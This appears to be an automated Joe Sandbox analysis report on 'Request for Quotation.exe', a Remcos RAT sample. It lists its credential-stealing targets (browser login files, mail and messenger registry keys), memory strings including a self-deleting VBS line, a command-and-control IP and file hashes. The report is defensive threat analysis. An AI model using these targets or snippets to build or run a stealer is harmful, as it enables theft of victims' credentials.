          Source: Request for Quotation.exe, 00000001.00000002.903598740.0000000002A67000.00000004.00000001.sdmpBinary or memory string: |Program Manager|
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 1_2_004124A0 cpuid 1_2_004124A0
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: GetLocaleInfoA,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,1_2_00409E7D
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: GetLocaleInfoA,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,1_1_00409E7D
          Source: C:\Users\user\Desktop\Request for Quotation.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 1_2_00402580 GetLocalTime,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,printf,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,CreateThread,1_2_00402580
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 1_2_00412163 GetUserNameW,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,1_2_00412163
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 0_2_00403486 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403486
          Source: C:\Users\user\Desktop\Request for Quotation.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information:

          barindex
          Yara detected Remcos RATShow sources
          Source: Yara matchFile source: 00000001.00000002.903195414.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.644079874.0000000002A50000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: Request for Quotation.exe PID: 7164, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: Request for Quotation.exe PID: 612, type: MEMORY
          Source: Yara matchFile source: 1.1.Request for Quotation.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.Request for Quotation.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Request for Quotation.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Request for Quotation.exe.2a50000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Request for Quotation.exe.2a50000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Request for Quotation.exe.400000.0.unpack, type: UNPACKEDPE
          Contains functionality to steal Chrome passwords or cookiesShow sources
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data1_2_0040710F
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data1_1_0040710F
          Contains functionality to steal Firefox passwords or cookiesShow sources
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\1_2_0040728F
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: \key3.db1_2_0040728F
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\1_1_0040728F
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: \key3.db1_1_0040728F
          Tries to harvest and steal browser information (history, passwords, etc)Show sources
          Source: C:\Users\user\Desktop\Request for Quotation.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
          Source: C:\Users\user\Desktop\Request for Quotation.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
          Tries to steal Instant Messenger accounts or passwordsShow sources
          Source: C:\Users\user\Desktop\Request for Quotation.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Dynamic SaltJump to behavior
          Source: C:\Users\user\Desktop\Request for Quotation.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
          Source: C:\Users\user\Desktop\Request for Quotation.exeKey opened: HKEY_CURRENT_USER\Software\PaltalkJump to behavior
          Source: C:\Users\user\Desktop\Request for Quotation.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
          Source: C:\Users\user\Desktop\Request for Quotation.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Dynamic SaltJump to behavior
          Tries to steal Mail credentials (via file access)Show sources
          Source: C:\Users\user\Desktop\Request for Quotation.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
          Source: C:\Users\user\Desktop\Request for Quotation.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
          Source: C:\Users\user\Desktop\Request for Quotation.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
          Source: C:\Users\user\Desktop\Request for Quotation.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live MailJump to behavior
          Tries to steal Mail credentials (via file registry)Show sources
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: ESMTPPassword5_2_004033E2
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword5_2_00402DA5
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword5_2_00402DA5
          Yara detected WebBrowserPassView password recovery toolShow sources
          Source: Yara matchFile source: Process Memory Space: Request for Quotation.exe PID: 6188, type: MEMORY

          Remote Access Functionality:

          barindex
          Detected Remcos RATShow sources
          Source: Request for Quotation.exe, 00000000.00000002.644079874.0000000002A50000.00000004.00000001.sdmpString found in binary or memory: Remcos_Mutex_Inj
          Source: Request for Quotation.exe, 00000000.00000002.644079874.0000000002A50000.00000004.00000001.sdmpString found in binary or memory: \uninstall.vbsexepath\update.vbsCreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)\restart.vbsNormalAccess level: Administratorlicence (32 bit) (64 bit)ProductNameInjRemcos_Mutex_InjWDSoftware\licence_code.txt-lShlwapi.dllGetMonitorInfoWEnumDisplayMonitorsuser32EnumDisplayDevicesWSetProcessDEPPolicyShell32IsUserAnAdminGetComputerNameExWkernel32IsWow64Processkernel32.dllGlobalMemoryStatusExGetModuleFileNameExWKernel32.dllPsapi.dllGetModuleFileNameExAProgram Files (x86)\Program Files\1SETTINGS2.7.2 Propth_unencoverridev
          Source: Request for Quotation.exeString found in binary or memory: Remcos_Mutex_Inj
          Source: Request for Quotation.exe, 00000001.00000002.903195414.0000000000400000.00000040.00000001.sdmpString found in binary or memory: \uninstall.vbsexepath\update.vbsCreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)\restart.vbsNormalAccess level: Administratorlicence (32 bit) (64 bit)ProductNameInjRemcos_Mutex_InjWDSoftware\licence_code.txt-lShlwapi.dllGetMonitorInfoWEnumDisplayMonitorsuser32EnumDisplayDevicesWSetProcessDEPPolicyShell32IsUserAnAdminGetComputerNameExWkernel32IsWow64Processkernel32.dllGlobalMemoryStatusExGetModuleFileNameExWKernel32.dllPsapi.dllGetModuleFileNameExAProgram Files (x86)\Program Files\1SETTINGS2.7.2 Propth_unencoverridev
          Yara detected Remcos RATShow sources
          Source: Yara matchFile source: 00000001.00000002.903195414.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.644079874.0000000002A50000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: Request for Quotation.exe PID: 7164, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: Request for Quotation.exe PID: 612, type: MEMORY
          Source: Yara matchFile source: 1.1.Request for Quotation.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.Request for Quotation.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Request for Quotation.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Request for Quotation.exe.2a50000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Request for Quotation.exe.2a50000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Request for Quotation.exe.400000.0.unpack, type: UNPACKEDPE
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: cmd.exe1_2_00402B8A
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: cmd.exe1_1_00402B8A

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsNative API1Application Shimming1Application Shimming1Deobfuscate/Decode Files or Information1OS Credential Dumping2System Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer11Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
          Default AccountsCommand and Scripting Interpreter1Windows Service1Access Token Manipulation1Obfuscated Files or Information3Input Capture111Account Discovery1Remote Desktop ProtocolData from Local System1Exfiltration Over BluetoothEncrypted Channel2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsService Execution2Logon Script (Windows)Windows Service1Software Packing22Credentials in Registry2System Service Discovery1SMB/Windows Admin SharesEmail Collection1Automated ExfiltrationNon-Standard Port1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Process Injection322Masquerading1Credentials In Files3File and Directory Discovery3Distributed Component Object ModelInput Capture111Scheduled TransferRemote Access Software1SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptVirtualization/Sandbox Evasion2LSA SecretsSystem Information Discovery48SSHClipboard Data2Data Transfer Size LimitsApplication Layer Protocol1Manipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonAccess Token Manipulation1Cached Domain CredentialsSecurity Software Discovery21VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsProcess Injection322DCSyncVirtualization/Sandbox Evasion2Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemProcess Discovery4Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadowApplication Window Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
          Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork SniffingSystem Owner/User Discovery1Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          Request for Quotation.exe27%VirustotalBrowse
          Request for Quotation.exe14%MetadefenderBrowse
          Request for Quotation.exe21%ReversingLabsWin32.Backdoor.Remcos
          Request for Quotation.exe100%Joe Sandbox ML

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\aqx5kku77.dll6%ReversingLabs
          C:\Users\user\AppData\Local\Temp\nsc77A8.tmp\System.dll0%MetadefenderBrowse
          C:\Users\user\AppData\Local\Temp\nsc77A8.tmp\System.dll0%ReversingLabs

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          3.0.Request for Quotation.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
          0.2.Request for Quotation.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
          1.0.Request for Quotation.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
          4.2.Request for Quotation.exe.400000.0.unpack100%AviraHEUR/AGEN.1116590Download File
          5.0.Request for Quotation.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
          1.1.Request for Quotation.exe.400000.0.unpack100%AviraBDS/Backdoor.GenDownload File
          5.2.Request for Quotation.exe.400000.0.unpack100%AviraHEUR/AGEN.1116590Download File
          4.0.Request for Quotation.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
          0.2.Request for Quotation.exe.2a50000.5.unpack100%AviraBDS/Backdoor.GenDownload File
          3.2.Request for Quotation.exe.400000.0.unpack100%AviraHEUR/AGEN.1116566Download File
          0.0.Request for Quotation.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
          1.2.Request for Quotation.exe.400000.0.unpack100%AviraBDS/Backdoor.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.imvu.comr0%Avira URL Cloudsafe
          103.89.88.2380%Avira URL Cloudsafe
          http://www.ebuddy.com0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          No contacted domains info

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          103.89.88.238true
          • Avira URL Cloud: safe
          		unknown

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          https://contextual.media.net/checksync.phphttps://contextual.media.net/medianet.php?cid=8CU157172&crRequest for Quotation.exe, 00000003.00000003.653713973.00000000022C4000.00000004.00000001.sdmpfalse
            		high
            https://login.yahoo.com/config/loginRequest for Quotation.exefalse
              		high
              http://www.imvu.comrRequest for Quotation.exe, 00000004.00000002.652481642.0000000000400000.00000040.00000001.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://nsis.sf.net/NSIS_ErrorRequest for Quotation.exefalse
                		high
                http://www.nirsoft.netRequest for Quotation.exe, 00000003.00000002.654097061.0000000000193000.00000004.00000010.sdmpfalse
                  		high
                  http://nsis.sf.net/NSIS_ErrorErrorRequest for Quotation.exefalse
                    		high
                    http://www.nirsoft.net/Request for Quotation.exe, Request for Quotation.exe, 00000005.00000001.652992004.0000000000400000.00000040.00020000.sdmpfalse
                      		high
                      https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2Request for Quotation.exe, 00000003.00000003.652133843.00000000022C3000.00000004.00000001.sdmp, Request for Quotation.exe, 00000003.00000003.653713973.00000000022C4000.00000004.00000001.sdmpfalse
                        		high
                        http://www.ebuddy.comRequest for Quotation.exefalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.imvu.comRequest for Quotation.exefalse
                          		high

                          Contacted IPs

                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs

                          Public

                          IPDomainCountryFlagASNASN NameMalicious
                          103.89.88.238
                          		unknownViet Nam
                          		135905VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVNtrue

                          Private

                          IP
                          192.168.2.1

                          General Information

                          Joe Sandbox Version:31.0.0 Emerald
                          Analysis ID:356426
                          Start date:23.02.2021
                          Start time:07:35:17
                          Joe Sandbox Product:CloudBasic
                          Overall analysis duration:0h 10m 23s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Sample file name:Request for Quotation.exe
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                          Number of analysed new started processes analysed:20
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • HDC enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Detection:MAL
                          Classification:mal100.phis.troj.spyw.evad.winEXE@9/6@0/2
                          EGA Information:Failed
                          HDC Information:
                          • Successful, ratio: 78.9% (good quality ratio 62.7%)
                          • Quality average: 62.9%
                          • Quality standard deviation: 39.3%
                          HCA Information:
                          • Successful, ratio: 89%
                          • Number of executed functions: 161
                          • Number of non-executed functions: 187
                          Cookbook Comments:
                          • Adjust boot time
                          • Enable AMSI
                          • Found application associated with file extension: .exe
                          Warnings:
                          Show All
                          • Exclude process from analysis (whitelisted): taskhostw.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, UsoClient.exe, wuapihost.exe
                          • Report creation exceeded maximum time and may have missing disassembly code information.
                          • Report size exceeded maximum capacity and may have missing disassembly code.
                          • Report size getting too big, too many NtReadVirtualMemory calls found.

                          Simulations

                          Behavior and APIs

                          TimeTypeDescription
                          07:36:03API Interceptor1081x Sleep call for process: Request for Quotation.exe modified

                          Joe Sandbox View / Context

                          IPs

                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                          103.89.88.238quote.exeGet hashmaliciousBrowse
                            Quote.exeGet hashmaliciousBrowse
                              Quotation Request.exeGet hashmaliciousBrowse
                                payment.exeGet hashmaliciousBrowse
                                  Quotation(6656).exeGet hashmaliciousBrowse
                                    swift copy.exeGet hashmaliciousBrowse

                                      Domains

                                      No context

                                      ASN

                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                      VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN#U007einvoice#U007eSC00978656.xlsxGet hashmaliciousBrowse
                                      • 103.99.1.145
                                      quote.exeGet hashmaliciousBrowse
                                      • 103.89.88.238
                                      Our New Order Feb 22 2021 at 2.30_PVV440_PDF.exeGet hashmaliciousBrowse
                                      • 103.114.107.184
                                      RFQ Manual Supersucker en Espaol.xlsxGet hashmaliciousBrowse
                                      • 103.141.138.128
                                      quotation10204168.dox.xlsxGet hashmaliciousBrowse
                                      • 103.140.251.164
                                      notice of arrival.xlsxGet hashmaliciousBrowse
                                      • 103.147.184.10
                                      22-2-2021 .xlsxGet hashmaliciousBrowse
                                      • 103.141.138.118
                                      Shipping_Document.xlsxGet hashmaliciousBrowse
                                      • 103.141.138.119
                                      Remittance copy.xlsxGet hashmaliciousBrowse
                                      • 103.99.1.145
                                      CI + PL.xlsxGet hashmaliciousBrowse
                                      • 103.141.138.121
                                      RFQ_Enquiry_0002379_.xlsxGet hashmaliciousBrowse
                                      • 103.141.138.117
                                      purchase order.exeGet hashmaliciousBrowse
                                      • 103.151.124.64
                                      IMAGE21200021118921000.exeGet hashmaliciousBrowse
                                      • 103.151.123.132
                                      MV TEAL BULKERS.xlsxGet hashmaliciousBrowse
                                      • 103.141.138.120
                                      ForeignRemittance_20210219_USD.xlsxGet hashmaliciousBrowse
                                      • 103.147.184.10
                                      HBL VRNA00872.xlsxGet hashmaliciousBrowse
                                      • 103.125.191.182
                                      statement.xlsxGet hashmaliciousBrowse
                                      • 103.99.1.149
                                      MV SEASPAN EMERALD II.xlsxGet hashmaliciousBrowse
                                      • 103.141.138.121
                                      _Doc_Shipment_330393_.xlsxGet hashmaliciousBrowse
                                      • 103.141.138.117
                                      HBL VRN0924588.xlsxGet hashmaliciousBrowse
                                      • 103.140.251.164

                                      JA3 Fingerprints

                                      No context

                                      Dropped Files

                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                      C:\Users\user\AppData\Local\Temp\nsc77A8.tmp\System.dll#U007einvoice#U007eSC00978656.xlsxGet hashmaliciousBrowse
                                        Purchase Order___pdf ____________.exeGet hashmaliciousBrowse
                                          quote.exeGet hashmaliciousBrowse
                                            Order83930.exeGet hashmaliciousBrowse
                                              Invoice 6500TH21Y5674.exeGet hashmaliciousBrowse
                                                Invoice 6500TH21Y5674.exeGet hashmaliciousBrowse
                                                  GPP.exeGet hashmaliciousBrowse
                                                    OrderSuppliesQuote0817916.exeGet hashmaliciousBrowse
                                                      ACCOUNT DETAILS.exeGet hashmaliciousBrowse
                                                        Quotation.com.exeGet hashmaliciousBrowse
                                                          Unterlagen PDF.exeGet hashmaliciousBrowse
                                                            QuotationInvoices.exeGet hashmaliciousBrowse
                                                              PO.exeGet hashmaliciousBrowse
                                                                SecuriteInfo.com.TrojanSpy.MSIL.Agent.22886.exeGet hashmaliciousBrowse
                                                                  SecuriteInfo.com.FileRepMalware.24882.exeGet hashmaliciousBrowse
                                                                    PDF_doc.exeGet hashmaliciousBrowse
                                                                      09000000000000.jarGet hashmaliciousBrowse
                                                                        quotation10204168.dox.xlsxGet hashmaliciousBrowse
                                                                          notice of arrivalpdf.exeGet hashmaliciousBrowse
                                                                            R5BNZ68i0f.exeGet hashmaliciousBrowse

                                                                              Created / dropped Files

                                                                              C:\Users\user\AppData\Local\Temp\aqx5kku77.dll
                                                                              Process:C:\Users\user\Desktop\Request for Quotation.exe
                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):21504
                                                                              Entropy (8bit):7.408207836374235
                                                                              Encrypted:false
                                                                              SSDEEP:384:OOCV5PqjbmDbusFpGZO7gOG4/yr5RdXF82WNbx/9gJTALB+deFk+riSlxV:O1zPmC/uaG46Rq/9gJALB4+t
                                                                              MD5:D58BF216C5DA94776AACA50132847A49
                                                                              SHA1:4444CBB553381C13409707562CED76CE6525879E
                                                                              SHA-256:04870A6CB3CF7B291FA4BB2378B3AEAE921E0C5D220A8420C327D779B7FD2180
                                                                              SHA-512:19E7F5EF052AE1195A01A993FC3B2E5DD464299A5E666DAA18132FE7F6264A9F354136CC2F3C90D0B20E7FCDC4BF9F8F55C2D63CB74DF0C6DA6F1FB1610AF4FA
                                                                              Malicious:false
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 6%
                                                                              Reputation:low
                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............e.N.e.N.e.N.e.N.e.NI..N.e.N..cN.e.N..gN.e.N..dN.e.N..aN.e.NRich.e.N................PE..L....84`...........!.........L............... ............................................@.........................P$..I.... ..................................d.................................................... ...............................code............................... ....rdata....... ......................@..@.data....@...0...B..................@....rsrc................P..............@..@.reloc...............R..............@..B................................................................................................................................................................................................................................................................................................................................................
                                                                              C:\Users\user\AppData\Local\Temp\hbieekorpghvpuxbpehxjpq
                                                                              Process:C:\Users\user\Desktop\Request for Quotation.exe
                                                                              File Type:Little-endian UTF-16 Unicode text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):2
                                                                              Entropy (8bit):1.0
                                                                              Encrypted:false
                                                                              SSDEEP:3:Qn:Qn
                                                                              MD5:F3B25701FE362EC84616A93A45CE9998
                                                                              SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                              SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                              SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                              Malicious:false
                                                                              Reputation:high, very likely benign file
                                                                              Preview: ..
                                                                              C:\Users\user\AppData\Local\Temp\nsc77A8.tmp\System.dll
                                                                              Process:C:\Users\user\Desktop\Request for Quotation.exe
                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):11776
                                                                              Entropy (8bit):5.855045165595541
                                                                              Encrypted:false
                                                                              SSDEEP:192:xPtkiQJr7V9r3HcU17S8g1w5xzWxy6j2V7i77blbTc4v:g7VpNo8gmOyRsVc4
                                                                              MD5:FCCFF8CB7A1067E23FD2E2B63971A8E1
                                                                              SHA1:30E2A9E137C1223A78A0F7B0BF96A1C361976D91
                                                                              SHA-256:6FCEA34C8666B06368379C6C402B5321202C11B00889401C743FB96C516C679E
                                                                              SHA-512:F4335E84E6F8D70E462A22F1C93D2998673A7616C868177CAC3E8784A3BE1D7D0BB96F2583FA0ED82F4F2B6B8F5D9B33521C279A42E055D80A94B4F3F1791E0C
                                                                              Malicious:false
                                                                              Antivirus:
                                                                              • Antivirus: Metadefender, Detection: 0%, Browse
                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                              Joe Sandbox View:
                                                                              • Filename: #U007einvoice#U007eSC00978656.xlsx, Detection: malicious, Browse
                                                                              • Filename: Purchase Order___pdf ____________.exe, Detection: malicious, Browse
                                                                              • Filename: quote.exe, Detection: malicious, Browse
                                                                              • Filename: Order83930.exe, Detection: malicious, Browse
                                                                              • Filename: Invoice 6500TH21Y5674.exe, Detection: malicious, Browse
                                                                              • Filename: Invoice 6500TH21Y5674.exe, Detection: malicious, Browse
                                                                              • Filename: GPP.exe, Detection: malicious, Browse
                                                                              • Filename: OrderSuppliesQuote0817916.exe, Detection: malicious, Browse
                                                                              • Filename: ACCOUNT DETAILS.exe, Detection: malicious, Browse
                                                                              • Filename: Quotation.com.exe, Detection: malicious, Browse
                                                                              • Filename: Unterlagen PDF.exe, Detection: malicious, Browse
                                                                              • Filename: QuotationInvoices.exe, Detection: malicious, Browse
                                                                              • Filename: PO.exe, Detection: malicious, Browse
                                                                              • Filename: SecuriteInfo.com.TrojanSpy.MSIL.Agent.22886.exe, Detection: malicious, Browse
                                                                              • Filename: SecuriteInfo.com.FileRepMalware.24882.exe, Detection: malicious, Browse
                                                                              • Filename: PDF_doc.exe, Detection: malicious, Browse
                                                                              • Filename: 09000000000000.jar, Detection: malicious, Browse
                                                                              • Filename: quotation10204168.dox.xlsx, Detection: malicious, Browse
                                                                              • Filename: notice of arrivalpdf.exe, Detection: malicious, Browse
                                                                              • Filename: R5BNZ68i0f.exe, Detection: malicious, Browse
                                                                              Reputation:moderate, very likely benign file
                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ir*.-.D.-.D.-.D...J.*.D.-.E.>.D.....*.D.y0t.).D.N1n.,.D..3@.,.D.Rich-.D.........PE..L.....$_...........!..... ..........!).......0...............................`............@..........................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..c....0.......$..............@..@.data...h....@.......(..............@....reloc..|....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                                              C:\Users\user\AppData\Local\Temp\nsh7778.tmp
                                                                              Process:C:\Users\user\Desktop\Request for Quotation.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):167858
                                                                              Entropy (8bit):7.8527235413443
                                                                              Encrypted:false
                                                                              SSDEEP:3072:f/h6lq6XCc3XMkVOx0E/fhZA1lVN1189+pvOCrEfAWUWISphqya8DJNt:f2XCcH9Oe2TA33k+B3rgUWISpmMt
                                                                              MD5:9DACD2D5556A613412125B915ACC0A25
                                                                              SHA1:E57BA62C9D50A89174C1666F095DEB590B2D4F7B
                                                                              SHA-256:E44512128A5ED7778937E92B409D600C2889EE1C6D47582423C46DC411D2F2F2
                                                                              SHA-512:04ECBB17A1F333DD33DFCD7F1EFCA692B3787A6D8470C1BFFC70A263BA18E3E3F8437F7AA267407CE03A7004B92E8BB0555F3CB65BFACB664A5A096C70455A75
                                                                              Malicious:false
                                                                              Reputation:low
